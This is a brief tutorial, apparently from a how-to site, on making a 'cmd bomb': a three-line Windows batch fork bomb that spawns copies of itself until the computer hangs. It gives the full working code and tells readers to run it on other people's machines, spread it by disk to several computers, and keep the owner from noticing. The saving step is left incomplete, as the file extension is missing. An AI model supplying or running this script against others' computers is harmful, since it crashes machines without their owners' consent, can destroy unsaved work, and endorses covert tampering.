This is how to make a cmd bomb, a tool that shuts off a computer. It can be used it for pranks, or maybe even something purposeful.
Follow The Steps Outline Below

• Open notepad.
• Paste in the following code:
  @echo off
  start %0
  %0
• Save as any name you wish, ending the file with the extension . 
• Drag this file to the computer you plan to shut off or prank, and double click to use. 

Tips 

• If you wish to use on multiple computers, save it on a disk or floppy drive, and simply drag and drop.

• Don't let anyone see you doing this, especially the owner of the computer
